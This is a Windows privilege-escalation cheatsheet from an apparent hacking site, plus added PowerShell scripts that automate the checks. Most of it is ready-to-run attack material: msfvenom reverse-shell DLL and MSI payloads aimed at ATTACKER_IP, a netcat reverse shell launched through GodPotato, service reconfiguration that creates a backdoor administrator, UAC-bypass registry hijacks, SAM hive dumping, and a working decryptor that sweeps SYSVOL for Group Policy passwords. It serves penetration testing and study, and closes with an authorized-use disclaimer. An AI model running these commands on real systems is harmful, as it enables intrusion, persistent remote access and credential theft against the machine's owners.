Windows Privilege Escalation Quick Reference
Hackers Manifest - hackersmanifest.com
Windows PrivEsc Cheatsheet
Essential commands for escalating privileges on Windows systems.
System Enumeration
# System info
systeminfo
hostname
whoami /all
whoami /priv
# OS version and patches (wmic is deprecated and absent on recent Windows 11 builds;
# there, use Get-CimInstance Win32_OperatingSystem / Win32_QuickFixEngineering instead)
wmic os get Caption,Version,BuildNumber
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Network info
ipconfig /all
route print
netstat -ano
arp -a
# Users and groups
net user
net localgroup
net localgroup Administrators
query user
Automated Tools
WinPEAS
# Download and run
curl -o winpeas.exe https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe
winpeas.exe
# Specific checks
winpeas.exe quiet servicesinfo
winpeas.exe quiet applicationsinfo
winpeas.exe quiet userinfo
# Output to file
winpeas.exe log=output.txt
PowerUp
# Import PowerUp (either form works; if the execution policy blocks it, start with powershell -ep bypass)
. .\PowerUp.ps1
Import-Module .\PowerUp.ps1
# Run all checks
Invoke-AllChecks
# Specific checks
Get-ServiceUnquoted
Get-ModifiableServiceFile
Get-ModifiableService
Find-ProcessDLLHijack
Service Exploits
Unquoted Service Path
# Find unquoted service paths (auto-start services are the interesting ones)
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """
# PowerShell
Get-WmiObject win32_service | Select-Object Name, PathName | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'}
# If path is: C:\Program Files\Vuln App\service.exe
# CreateProcess tries each space-delimited prefix before the real binary, so write the payload to:
# C:\Program.exe or C:\Program Files\Vuln.exe (needs write access to C:\ or C:\Program Files\; check with icacls)
# Restart service (needs SERVICE_STOP/SERVICE_START on it; otherwise an Automatic service fires on the next reboot)
# In PowerShell type sc.exe, not sc (sc is an alias for Set-Content there)
sc stop VulnService
sc start VulnService
Weak Service Permissions
# Check service permissions with accesschk (Sysinternals)
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Modify service binary path (needs SERVICE_CHANGE_CONFIG; note the space after binpath=)
sc config VulnService binpath= "C:\temp\shell.exe"
# The SCM runs binpath directly, so shell operators such as && only work through cmd /c. The service
# will report error 1053 (not a real service, never signals started) but the command still runs as SYSTEM
sc config VulnService binpath= "cmd /c net user hacker P@ssw0rd /add && net localgroup Administrators hacker /add"
# Restart service
net stop VulnService
net start VulnService
# Check service permissions in registry (write access to the ImagePath value is as good as SERVICE_CHANGE_CONFIG)
Get-Acl -Path HKLM:\System\CurrentControlSet\Services\VulnService | Format-List
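Added example, not from the original page: a PowerShell equivalent of the accesschk -uwcqv sweep above that uses only built-in tooling. It pulls each service's security descriptor with sc.exe sdshow, parses the SDDL with .NET's RawSecurityDescriptor, and reports every allow ACE that grants one of the current token's SIDs (the user plus all its groups, which is how Everyone and Authenticated Users get matched) a right that lets it change what the service executes. The right names and masks are the documented Win32 service access rights; the deny-ACE handling is simplified (deny entries are skipped rather than subtracted), which is the one thing accesschk does more carefully.

```powershell
# Added example (not from the original page). Built-in tooling only: sc.exe + .NET security classes.
$ServiceRights = @{
    SERVICE_CHANGE_CONFIG = 0x0002        # enough for: sc config <svc> binpath= ...
    SERVICE_START         = 0x0010
    SERVICE_STOP          = 0x0020
    WRITE_DAC             = 0x00040000    # rewrite the DACL, then grant yourself everything
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
    SERVICE_ALL_ACCESS    = 0x000F01FF
}
$Dangerous = 'SERVICE_CHANGE_CONFIG','WRITE_DAC','WRITE_OWNER','GENERIC_ALL','GENERIC_WRITE','SERVICE_ALL_ACCESS'

function Get-CurrentSids {
    # The token's own SID plus every group SID, including Everyone (S-1-1-0) and Authenticated Users (S-1-5-11)
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Get-ServiceAceReport {
    param([string[]]$Name = (Get-Service | Select-Object -ExpandProperty Name))
    $mySids = Get-CurrentSids
    foreach ($svc in $Name) {
        # sdshow prints a blank line, the SDDL ("D:(...)S:(...)"), and a blank line; "Access is denied" never matches ^D:
        $sddl = (sc.exe sdshow $svc 2>$null | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }
        $sd = New-Object Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne [Security.AccessControl.AceType]::AccessAllowed) { continue }   # deny ACEs skipped (simplification)
            if (-not $ace.SecurityIdentifier -or $mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
            $granted = @($ServiceRights.Keys | Where-Object { ($ace.AccessMask -band $ServiceRights[$_]) -eq $ServiceRights[$_] })
            $bad = @($granted | Where-Object { $Dangerous -contains $_ })
            if ($bad.Count -eq 0) { continue }
            $who = try { $ace.SecurityIdentifier.Translate([Security.Principal.NTAccount]).Value } catch { $ace.SecurityIdentifier.Value }
            [pscustomobject]@{
                Service    = $svc
                Principal  = $who
                Rights     = ($bad -join ',')
                # Changing binpath is only useful if you can also bounce the service (or wait for a reboot)
                CanRestart = ($granted -contains 'SERVICE_START') -and ($granted -contains 'SERVICE_STOP')
            }
        }
    }
}

Get-ServiceAceReport | Format-Table -AutoSize
```

Run it as the low-privileged user whose rights you are assessing; the output is only meaningful for that token. A hit with CanRestart = False is still exploitable if the service's start type is Automatic and you can trigger a reboot (shutdown /r needs SeShutdownPrivilege).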
DLL Hijacking
# Find missing DLLs (Process Monitor needs admin to load its driver, so this is a lab/recon step)
# Use Process Monitor - filter: Result = NAME NOT FOUND, Path ends with .dll
# Default (SafeDllSearchMode) search order, after Known DLLs and already-loaded modules are resolved:
# 1. Directory of executable
# 2. C:\Windows\System32 (SysWOW64 for a 32-bit process on x64)
# 3. C:\Windows\System
# 4. C:\Windows
# 5. Current directory
# 6. Directories in PATH
# Writable directories to exploit (a writable directory on PATH hijacks any privileged process
# that loads a DLL missing from the earlier locations, the classic case being C:\Python27 or similar)
icacls "C:\Program Files\VulnApp"
icacls "C:\Program Files (x86)\VulnApp"
# Generate malicious DLL (payload runs from DllMain; for a DLL pulled in through the import table a
# missing export aborts the load before DllMain runs, so proxy the real exports or target LoadLibrary-time loads)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f dll -o hijack.dll
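Added example, not from the original page, serving both the unquoted-service-path section above and the DLL search order here. For every service it (1) computes the prefix paths CreateProcess would try for an unquoted ImagePath containing spaces, and (2) walks the directories the loader probes for a DLL missing from the application directory, then checks which of those locations the current user can actually write to by creating and deleting a probe file (ACL inspection alone misses deny entries and the effective rights of the running token). It assumes PowerShell 3+ and a 64-bit host; every service name and path comes from the machine it runs on, nothing is hard-coded to the VulnService example.

```powershell
# Added example (not from the original page). PowerShell 3+; x64 host assumed for the search order.
function Test-Writable {
    # Create and delete a probe file rather than reading ACLs: reflects deny ACEs and the caller's real token.
    param([string]$Dir)
    if (-not $Dir -or -not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('.' + [guid]::NewGuid().ToString('N'))
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true } catch { $false }
}

function Get-ServiceExe {
    # Strip quotes and arguments from Win32_Service.PathName, returning just the executable.
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }   # -match is case-insensitive
    return $PathName
}

function Get-UnquotedServicePath {
    # For C:\Program Files\Vuln App\service.exe CreateProcess tries C:\Program.exe,
    # then C:\Program Files\Vuln.exe, and only then the real binary.
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { return }             # quoted paths are safe
        $exe = Get-ServiceExe $p
        if ($exe -notmatch ' ' -or $exe -match '^[A-Za-z]:\\Windows\\') { return }
        $candidates = @(); $idx = $exe.IndexOf(' ')
        while ($idx -gt 0) { $candidates += $exe.Substring(0, $idx) + '.exe'; $idx = $exe.IndexOf(' ', $idx + 1) }
        $writable = @($candidates | Where-Object { Test-Writable (Split-Path $_ -Parent) })
        if ($writable.Count -gt 0) {
            [pscustomobject]@{ Service = $svc.Name; StartMode = $svc.StartMode; RunsAs = $svc.StartName
                               ImagePath = $exe; DropPayloadAt = ($writable -join '; ') }
        }
    }
}

function Get-DllSearchDirs {
    # SafeDllSearchMode order from the text. Services start with System32 as their current
    # directory, so the "current directory" step collapses into step 2 and is omitted here.
    param([Parameter(Mandatory)][string]$ExePath)
    $win = [Environment]::GetFolderPath('Windows')
    @((Split-Path $ExePath -Parent), (Join-Path $win 'System32'), (Join-Path $win 'System'), $win) +
        @($env:Path -split ';' | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') })
}

function Find-WritableDllDirs {
    # Every directory a service process would probe for a missing DLL, reduced to the writable ones.
    $pathDirs = @($env:Path -split ';' | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') })
    $dirs = Get-CimInstance Win32_Service | ForEach-Object { Get-ServiceExe $_.PathName } |
        Where-Object { $_ } | ForEach-Object { Get-DllSearchDirs -ExePath $_ } | Sort-Object -Unique
    foreach ($d in $dirs) {
        if (Test-Writable $d) { [pscustomobject]@{ Directory = $d; OnPath = ($pathDirs -contains $d) } }
    }
}

Get-UnquotedServicePath | Format-List
Find-WritableDllDirs | Format-Table -AutoSize
```

A writable directory with OnPath = True is the best outcome: it is searched last, so it only catches DLLs that genuinely do not exist anywhere earlier, which is exactly what the NAME NOT FOUND Process Monitor filter surfaces. For the unquoted-path hits, dropping the file is half the job; you still need to restart the service or, for StartMode = Auto, reboot.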
Registry Exploits
# AlwaysInstallElevated (both values must be REG_DWORD 1; either one alone does nothing)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If enabled, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f msi -o shell.msi
# Install MSI as SYSTEM (the Windows Installer service runs the package elevated)
msiexec /quiet /qn /i shell.msi
# AutoRun - Check for writable autoruns (these run as whoever logs in, so this only
# escalates when an administrator logs on interactively)
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
# Check write permissions on autorun binaries (and on the Run key itself)
accesschk.exe -wvu "C:\Path\To\AutorunApp.exe"
Scheduled Tasks
# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE
# Get task details
schtasks /query /tn "TaskName" /fo LIST /v
# Find tasks running as SYSTEM: show the three fields that matter next to each other
# (piping findstr into findstr with different strings returns nothing, because each filter drops the other's lines)
schtasks /query /fo LIST /v | findstr /i /C:"TaskName:" /C:"Task To Run:" /C:"Run As User:"
# Check permissions on task binaries (and on their directory: a writable directory allows planting a DLL next to the exe)
icacls "C:\Path\To\Task\Binary.exe"
accesschk.exe -wvu "C:\Path\To\Task\Binary.exe"
# If writable, replace with payload (keep a copy of the original; it fires on the task's next trigger)
copy C:\temp\shell.exe "C:\Path\To\Task\Binary.exe" /y
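Added example, not from the original page: the "tasks running as SYSTEM whose binary I can overwrite" check done in one pass with the ScheduledTasks module (Windows 8 / Server 2012 and later), instead of eyeballing schtasks output and running icacls on each path by hand. It expands %SystemRoot%-style variables in the action, strips quotes, and tests writability by actually opening the file for write, which also honours deny ACEs. Task names, principals and paths all come from the host; nothing is hard-coded.

```powershell
# Added example (not from the original page). Needs the ScheduledTasks module (Windows 8 / Server 2012+).
function Test-FileWritable {
    # Opening for write is the honest check: it reflects deny ACEs and the caller's real token.
    # A binary that is currently running fails this too (sharing violation), which is fine: you could not replace it now anyway.
    param([string]$Path)
    try { $fs = [IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite'); $fs.Dispose(); $true } catch { $false }
}

function Get-HijackableTask {
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        $p = $task.Principal
        # SYSTEM appears as "SYSTEM", "NT AUTHORITY\SYSTEM" or S-1-5-18 depending on how the task was created;
        # RunLevel Highest means the task gets the full (elevated) token of whoever it runs as
        $privileged = ($p.UserId -match '(^|\\)SYSTEM$|^S-1-5-18$') -or ($p.RunLevel -eq 'Highest')
        if (-not $privileged) { return }
        foreach ($a in @($task.Actions)) {
            if (-not $a.Execute) { continue }                        # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($a.Execute).Trim('"')
            if (-not [IO.Path]::IsPathRooted($exe)) { continue }    # bare names resolve through PATH; check PATH dirs separately
            [pscustomobject]@{
                Task         = $task.TaskPath + $task.TaskName
                RunsAs       = $p.UserId
                RunLevel     = $p.RunLevel
                Executable   = $exe
                Arguments    = $a.Arguments
                FileWritable = Test-FileWritable $exe
                NextRun      = (Get-ScheduledTaskInfo -InputObject $task).NextRunTime
            }
        }
    } | Where-Object { $_.FileWritable }
}

Get-HijackableTask | Format-Table -AutoSize
```

Get-ScheduledTask only returns tasks the current user can read, so an empty result does not prove there is nothing there; still run icacls on the directories of any interesting task binaries, since write access to the directory (not the file) is enough for a DLL drop beside the executable.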
Token Impersonation
Potato Attacks
# Check if SeImpersonatePrivilege is enabled (typical for service accounts: IIS application pools, MSSQL, LocalService/NetworkService)
whoami /priv
# JuicyPotato (up to Windows 10 1803 / Server 2016; the DCOM/OXID trick it relies on is fixed in 1809 / Server 2019 and later)
# -l is the local COM listen port; add -c <CLSID> if the default CLSID fails on the target build
JuicyPotato.exe -l 1337 -p c:\temp\shell.exe -t *
# PrintSpoofer (Windows 10 / Server 2016-2019 and later; requires the Print Spooler service to be running)
PrintSpoofer.exe -i -c "cmd /c c:\temp\shell.exe"
# GodPotato (works on current, patched builds: Win10/11, Server 2012-2022; needs .NET Framework)
GodPotato.exe -cmd "cmd /c c:\temp\shell.exe"
# SweetPotato (bundles several triggers; -e selects which one to use)
SweetPotato.exe -e EfsRpc -p c:\temp\shell.exe
Incognito
# Meterpreter (double the backslashes: meterpreter treats a single backslash as an escape)
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
impersonate_token "DOMAIN\\Administrator"
# Standalone incognito.exe
incognito.exe list_tokens -u
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
# Incognito needs one of these privileges (or local admin) to list and use other users' tokens;
# delegation tokens can authenticate to remote systems, impersonation tokens only work locally
whoami /priv | findstr SeImpersonate
whoami /priv | findstr SeAssignPrimaryToken
Credential Harvesting
# Saved credentials (runas /savecred only works for an entry that cmdkey lists with a stored password)
cmdkey /list
runas /savecred /user:DOMAIN\admin cmd
# Unattend files (search from the drive root with bare output; dir /s on its own only walks the current directory tree)
dir /s /b C:\*unattend.xml 2>nul
dir /s /b C:\*sysprep.xml 2>nul
dir /s /b C:\*sysprep.inf 2>nul
# Common locations (look for <Password> elements; the value is often just base64-encoded)
type C:\unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml
# Group Policy Preferences (cpassword): local cache under C:\ProgramData\Microsoft\Group Policy\History
# and SYSVOL on the DC (\\DC\SYSVOL\<domain>\Policies). The AES key is published, so any cpassword is recoverable
dir /s /b C:\Groups.xml 2>nul
findstr /si cpassword *.xml
# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear
# SAM/SYSTEM (reg save needs admin; as a low-privileged user look for readable backups instead:
# C:\Windows\Repair\SAM, C:\Windows\System32\config\RegBack\SAM, and volume shadow copies)
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
secretsdump.py -sam sam -system system LOCAL
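Added example, not from the original page: the decryption behind the cpassword check above, plus a sweep of the local GPP cache and SYSVOL that decrypts every hit in place. The AES-256 key is the one Microsoft published in the MS-GPPREF specification (which is exactly why any cpassword is recoverable); the IV is sixteen zero bytes, the base64 padding that GPP strips is restored, and the plaintext is UTF-16LE. The value at the end is a widely circulated public test vector, not a credential from any real system; it should decrypt to Local*P4ssword!.

```powershell
# Added example (not from the original page). Pure PowerShell / .NET; works on Windows PowerShell 5.1 and later.
function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # AES-256 key from MS-GPPREF (published by Microsoft); same key on every domain
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    # GPP drops the trailing '=' padding from the base64; put it back before decoding
    $b64 = $Cpassword.PadRight($Cpassword.Length + (4 - $Cpassword.Length % 4) % 4, '=')
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $key
    $aes.IV = New-Object byte[] 16          # all-zero IV
    $aes.Mode = 'CBC'
    $aes.Padding = 'PKCS7'
    $cipher = [Convert]::FromBase64String($b64)
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    [Text.Encoding]::Unicode.GetString($plain)  # plaintext is UTF-16LE
}

function Find-GppCpassword {
    # Local GPP cache first (readable by the user the policy applied to), then SYSVOL if domain-joined
    param([string[]]$Root = @("$env:ProgramData\Microsoft\Group Policy\History", "\\$env:USERDNSDOMAIN\SYSVOL"))
    foreach ($r in $Root) {
        if (-not $env:USERDNSDOMAIN -and $r -like '\\\*') { continue }
        if (-not (Test-Path -LiteralPath $r -ErrorAction SilentlyContinue)) { continue }
        # The preference files that carry credentials; the account attribute differs per file type
        Get-ChildItem -LiteralPath $r -Recurse -ErrorAction SilentlyContinue `
            -Include Groups.xml,Services.xml,ScheduledTasks.xml,DataSources.xml,Drives.xml,Printers.xml |
            Select-String -Pattern 'cpassword="([^"]+)"' -AllMatches |
            ForEach-Object {
                $line = $_.Line
                $user = if ($line -match '(userName|runAs|accountName)="([^"]*)"') { $Matches[2] } else { '' }
                foreach ($m in $_.Matches) {
                    [pscustomobject]@{
                        File     = $_.Path
                        UserName = $user
                        Password = ConvertFrom-GppCpassword $m.Groups[1].Value
                    }
                }
            }
    }
}

# Public test vector, not a real credential: expected plaintext Local*P4ssword!
ConvertFrom-GppCpassword 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw='
Find-GppCpassword | Format-Table -AutoSize
```

Microsoft removed the ability to set cpassword in 2014 (MS14-025), but it did not remove values that already existed, so old policies and the local History cache are still worth checking on long-lived domains.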
Kernel Exploits
# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,Version,BuildNumber
# Get hotfixes
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Windows Exploit Suggester (its MSSB spreadsheet feed ended in 2017, so it knows nothing newer;
# for current builds use wesng: wes.py --update, then wes.py sysinfo.txt)
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
# Common exploits by version
# Windows 7/2008 R2: MS16-032, MS15-051, MS14-058
# Windows 8/2012: MS16-032, MS15-051
# Windows 10/2016: public kernel exploits are rare and patched quickly; token abuse (Potato family) is usually the better route
# MS16-032 Secondary Logon Handle: dot-source the script, then call the function it defines
# (Invoke-MS16032 in the Empire copy, Invoke-MS16-032 in FuzzySecurity's original)
. .\Invoke-MS16032.ps1
Invoke-MS16032
# Check Exploit-DB and searchsploit (a wrong kernel exploit BSODs the box; confirm build and patch level first)
searchsploit windows kernel privilege escalation
Token Abuse — Potato Family
If you hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typical for IIS / MSSQL service accounts), the Potato family escalates to NT AUTHORITY\SYSTEM by coercing a privileged auth and impersonating the resulting token.
# Check for required privilege (SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege)
whoami /priv | findstr /i "impersonate assign"
# PrintSpoofer (Windows Server 2016/2019/2022, Win10/11; needs the Print Spooler service running)
PrintSpoofer.exe -i -c "cmd /c whoami"
# GodPotato (needs .NET Framework; uses a different DCOM/rpcss technique than JuicyPotato,
# so it still works on fully patched 2019/2022 and Win11 where the 1809 fix killed JuicyPotato)
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\temp\nc.exe ATTACKER 4444 -e cmd.exe"
# SigmaPotato (GodPotato fork: adds a built-in reverse shell and can be loaded in memory via .NET reflection)
SigmaPotato.exe "cmd.exe /c whoami"
# EfsPotato (MS-EFSRPC abuse; works when the spooler-based triggers are patched or the service is disabled)
# optional second argument picks the named pipe to coerce over (lsarpc default, efsrpc, samr, netlogon, lsass)
EfsPotato.exe "whoami"
# RoguePotato (for 1809+ / Server 2019 where JuicyPotato fails; needs an attacker-side redirector because the
# target's port 135 is taken: socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999 on ATTACKER_IP, then run:)
RoguePotato.exe -r ATTACKER_IP -e "cmd.exe" -l 9999
UAC Bypass — Modern Techniques
# Check UAC status (EnableLUA 0 = off, 1 = on; ConsentPromptBehaviorAdmin 0 = silent elevation,
# 5 = default, 2 = AlwaysNotify, which the auto-elevate tricks below do not beat)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
# These bypasses only apply to a user who is already in Administrators but running at Medium integrity
# (split token); they do not escalate a standard user
# Enumerate auto-elevate binaries
# https://github.com/hfiref0x/UACME — current technique catalog
# fodhelper.exe (ms-settings protocol handler hijack under HKCU — works on Win10/11)
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "cmd.exe /c whoami > C:\out.txt" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /f
start fodhelper.exe
# computerdefaults.exe (same registry technique, different binary)
start computerdefaults.exe
# clean up afterwards: reg delete "HKCU\Software\Classes\ms-settings" /f
# sdclt.exe (Folder\shell\open\command hijack, same DelegateExecute trick)
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /f
start sdclt.exe
# clean up afterwards: reg delete "HKCU\Software\Classes\Folder" /f
# Use UACME (Akagi.exe) for production-grade implementations
Akagi.exe 61 C:\Windows\System32\cmd.exe
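Added example, not from the original page: a precondition check for the bypasses above, since the commonest reason a fodhelper-style trick "does nothing" is that it was never applicable. It reads the two policy values the reg queries above show, then inspects the current token the way whoami /groups does (keyed on SIDs, so it works on non-English systems): on a filtered medium-integrity admin token the Administrators group is present but marked deny-only, while a fully elevated token reports high integrity. The consent-level descriptions are the documented ConsentPromptBehaviorAdmin meanings.

```powershell
# Added example (not from the original page). Decides whether an auto-elevate UAC bypass applies to this token.
function Get-UacBypassContext {
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $cpba = if ($null -ne $pol.ConsentPromptBehaviorAdmin) { [int]$pol.ConsentPromptBehaviorAdmin } else { 5 }

    # whoami /groups /fo csv gives "Group Name","Type","SID","Attributes"; match on SIDs, not names
    $groups   = whoami /groups /fo csv | ConvertFrom-Csv
    $adminRow = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }     # BUILTIN\Administrators
    $ilRow    = $groups | Where-Object { $_.SID -like 'S-1-16-*' }        # Mandatory Label (integrity level)

    # On a filtered (medium-IL) admin token the Administrators SID is present but "used for deny only";
    # IsInRole() therefore returns false until the process is actually elevated.
    # Note: the built-in RID-500 Administrator is not filtered unless FilterAdministratorToken = 1.
    $splitToken = [bool]$adminRow -and ($adminRow.Attributes -match 'deny only')
    $principal  = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
    $elevated   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    $prompt = switch ($cpba) {
        0 { 'Elevate without prompting' }
        1 { 'Prompt for credentials on the secure desktop' }
        2 { 'AlwaysNotify: prompt for consent on the secure desktop' }
        3 { 'Prompt for credentials' }
        4 { 'Prompt for consent' }
        5 { 'Prompt for consent for non-Windows binaries (default)' }
        default { "Unknown ($_)" }
    }

    [pscustomobject]@{
        EnableLUA           = $pol.EnableLUA
        AdminPromptBehavior = $prompt
        IntegrityLevel      = ($ilRow.'Group Name' -replace '^.*\\', '')
        IsSplitTokenAdmin   = $splitToken
        AlreadyElevated     = $elevated
        # fodhelper/sdclt-style bypasses need UAC on, a level other than AlwaysNotify, and a split token
        BypassApplicable    = ($pol.EnableLUA -eq 1) -and ($cpba -ne 2) -and $splitToken -and (-not $elevated)
    }
}

Get-UacBypassContext | Format-List
```

If IsSplitTokenAdmin is False and the user is not in Administrators at all, stop here: none of the registry hijacks above will help, and the service, token and scheduled-task routes earlier on this page are the right ones to pursue.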
Quick Reference
| Technique | Check Command | Required Privilege |
|---|---|---|
| Unquoted Path | wmic service get pathname | Write to path directory |
| Weak Service | accesschk.exe -uwcqv Users * | Modify service config |
| AlwaysInstallElevated | reg query HKLM\...\Installer | Any user |
| Token Impersonation | whoami /priv | SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege |
| Saved Creds | cmdkey /list | Any user |
| Kernel Exploit | systeminfo | Varies |
⚠️ Legal Disclaimer
Privilege escalation techniques are for authorized testing only. Always have written permission before attempting to escalate privileges on any system.